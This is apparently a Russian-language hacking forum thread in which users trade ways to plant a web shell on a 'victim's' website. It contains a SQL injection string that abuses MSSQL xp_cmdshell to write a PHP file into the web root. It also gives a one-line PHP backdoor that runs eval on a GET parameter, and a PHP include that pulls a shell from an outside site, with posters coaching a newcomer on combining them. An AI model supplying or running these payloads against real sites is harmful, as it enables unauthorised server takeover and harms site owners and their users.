Кто хочет читать всё что я там писал готовьтесь жмакать на кнопку pause Code: http://www.sharemania.ru/0226098 Видео от части навеяно вопросами в ПМ как я залил шелл в своём прошлом видео, вот вам ответ, показал не все дыры, но вам хватит P.S.Видео не выкладывают в video.antichat.ru по ходу это уже никаму ненужная бага, тему в принцепе можно сносить
Ета команда показавает всю инфу о ПХП : PHP: '; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:\AppServ\www\shell.php';-- А что надо прописать, чтобы отсюда -> http://globnet.oo.lv/shell.php загрузить шелл на сайт жертвы ???
Я всегда нелюбил людей которые тупо повторяют то что видят, нужно свои мозги иметь! Хотя чё я ждал снимая это видео, конечно привалят имено такие... В общем заливай <? stripslashes(eval($_GET[c])); ?> но stripslashes() не всегда надо, не везде экранирование, но на 90% серваках, а дальше тебе палюбому надо знать PHP, скачай книгу "самоучитель по PHP" и пачитай, там дальше поймёш
Круто. 10\10. Можно вопрос я За шол на какойто му в админку сам узнал как заходить не повторял как у тебя.Когда я хочу что там сменит меня снова выкидывает в админку в начало и не меняется,что делать? обращаюсь к тебе т.к ты понимаешь в этом деле.
ну впринцыпе ничего фантастического, но вопрос, как ты нашел багу, где в админку не пускает тупо только алертом =)))) за это молодец.
Ну вот...как ето понять PHP: <? stripslashes(eval($_GET[c])); ?> Тут понятнее PHP: '; USE Master exec xp_cmdshell 'echo "<?php phpinfo(); ?>" > C:AppServ/www/shell.php;-- понятно куда заливаешь, и в какой фаил может быть так и куда свой сайт вписовать (откуда шелл закачивать надо) ?
:d ето я понял...а мне же нужно шелл с сайта загрузить... - Скажи куда сылку вписовать, раз ты такой Умный :d ICQ - 387777909
PHP: <?php include ("www.site.com/shell.php"); ?> А всё таки лучше не много подчитай, чтобы понятнее было.
Code: '; USE Master exec xp_cmdshell 'echo "<?php include ("www.site.com/shell.php"); ?>" > C:AppServwwwshell.php;-- Ето должно получиться ? или просто вписовать ? Code: <?php include ("www.site.com/shell.php"); ?>